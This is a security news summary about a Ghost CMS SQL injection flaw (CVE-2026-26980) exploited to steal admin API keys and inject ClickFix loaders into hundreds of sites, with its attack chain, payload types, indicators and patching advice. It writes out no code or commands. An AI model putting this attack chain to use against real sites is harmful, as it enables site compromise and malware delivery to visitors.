699eee792235758e12e070c1
Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign
A critical Ghost CMS SQL injection (CVE-2026-26980) is being exploited in a large-scale ClickFix campaign, impacting 700+ domains including Harvard, Oxford, Auburn, and DuckDuckGo. The flaw allows unauthenticated access to read database data and steal admin API keys, enabling attackers to inject malicious JavaScript into articles. The attack chain uses stolen keys to deploy a loader that fetches second-stage payloads and a fake Cloudflare prompt to deliver the ClickFix lure, with multiple payloads observed. Ghost patched the flaw in version 6.19.1 on February 19, 2026, but many sites have not updated. Admins should upgrade to 6.19.1+, rotate all exposed keys, review IoCs, and maintain 30 days of admin API call logs for retrospective analysis, as operators have shown reinfection and varied payloads.
Ghost CMS SQL Injection Flaw Exploited in Large-Scale ClickFix Campaign
OverviewA critical SQL injection vulnerability in Ghost CMS (CVE-2026-26980) has been leveraged in a wide-reaching campaign to inject malicious JavaScript that triggers ClickFix attack flows. The flaw affects Ghost versions 3.24.0 through 6.19.0 and allows unauthenticated attackers to read arbitrary data from the website database, including admin API keys. The vulnerability was fixed in Ghost CMS version 6.19.1, released on February 19, but many sites did not apply the update in time, leaving them exposed.
Scope and Impact
- The campaign was identified by XLab threat intelligence researchers at Qianxin (China). It impacted more than 700 domains across diverse sectors, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.
- Notable targets reported as compromised include Harvard University, Oxford University, Auburn University, and DuckDuckGo.
- The exposed admin API keys provided elevated access to users, articles, and themes, enabling attackers to modify article pages and inject further payloads.
Attack Chain and Methodology
- Initial exploitation: Attackers used CVE-2026-26980 to read data from Ghost CMS databases and to obtain admin API keys without authentication.
- Privilege escalation: With admin-level access, they injected malicious JavaScript into existing articles.
- Second-stage loading: The injected JavaScript served as a loader that retrieved additional payloads from the attacker’s infrastructure.
- Visitor targeting: A fingerprinting step determined which visitors qualified as targets for the second-stage payloads.
- ClickFix lure: Targeted visitors were presented with a fake Cloudflare prompt loaded in an iframe atop the article page, which contained the ClickFix lure.
- Verification prompt: The ClickFix page instructed victims to verify they were human by pasting a command into the Windows command prompt; this action dropped the payload on the user’s system.
- Payloads observed: A variety of payloads were used, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.
Phases of the Campaign
- Initial breach and data exfiltration via CVE-2026-26980
- Script injection into article content
- Deployment of a multi-stage loader framework
- User-side verification prompt leading to payload execution
- Post-infection activity and payload variety to establish persistence or further compromise
Compromised Sites and Indicators
- The attacker activity was observed across hundreds of domains, with a focus on high-visibility targets and sensitive institutions.
- IoCs (indicators of compromise) include injected scripts embedded in article pages, altered page metadata, and changes to site assets that align with the loader and second-stage payload infrastructure.
- A thorough review of sites is required to locate injected scripts and remove them, as multiple campaigns have shown reinfection or overlapping payloads after cleanup.
Timeline of Key Events
- Vulnerability details: CVE-2026-26980 affecting Ghost versions 3.24.0 through 6.19.0
- Fix release: Ghost CMS version 6.19.1 released on February 19
- Exploitation observed in-the-wild: SentinelOne published details on February 27 about CVE-2026-26980 being exploited in attacks
- Campaign discovery: Researchers at XLab/MS teams confirmed the widespread impact and observed multiple attack clusters and variant payloads
- Notable compromised targets: High-profile institutions including Harvard University, Oxford University, Auburn University, and the DuckDuckGo search engine
Technical Details and Artifacts
- Admin API keys: Theft of these keys enabled elevated rights, including manipulation of articles and site configurations
- JavaScript loader: The injected code functions as a lightweight loader for second-stage components
- Second-stage payloads: DLL loaders, JavaScript droppers, and an Electron-based malware sample
- ClickFix infrastructure: The attack relies on a cloaking layer to deliver the final payloads to targeted visitors
Validation and Detection Considerations
- The campaigns show distinct activity clusters, sometimes reinfecting the same domains with new scripts after cleanup
- Clean sites may still harbor remnants or secondary payloads if comprehensive removal is not performed
- A careful comparison of article scripts, admin API usage, and site assets can help identify unauthorized changes and anomalous requests
Automated PenTesting and the Validation Gap
- Automated pentesting tools excel at answering whether an attacker can move laterally through a network, but they may not fully address whether your controls will block threats or whether detection rules will fire
- The broader lesson emphasizes validating multiple surface areas beyond initial access controls to ensure comprehensive defense coverage
- A multi-surface validation approach helps close the gap between initial breach detection and ongoing threat containment
Indicators of Compromise (IoCs) and Response Context
- Injected scripts embedded in article pages
- Unusual admin API activity or unexpected API key usage
- New or altered JavaScript payloads loaded on site pages
- Windows command prompt prompts appearing as part of human-verification prompts presented to visitors
- Unfamiliar DLL loaders, JavaScript droppers, and Electron-based executables observed in deployments
Notes on Mitigation Context
- The affected Ghost CMS versions have a patched release in version 6.19.1; historical advisories and subsequent threat intelligence discussions underscore the importance of applying critical fixes promptly to reduce exposure
- As a takeaway, administrators should review admin API key usage history and rotate credentials where exposure is suspected, and conduct a thorough audit of site scripts and assets
Closing Context
- The Ghost CMS CVE-2026-26980 incident highlights how a single unauthenticated read vulnerability can cascade into full-page injections, credential compromise, and multi-stage malware delivery
- The combination of vulnerable software, aggressive targeting, and layered payloads demonstrates the importance of timely patching, continuous monitoring, and comprehensive validation across surface areas of a website.
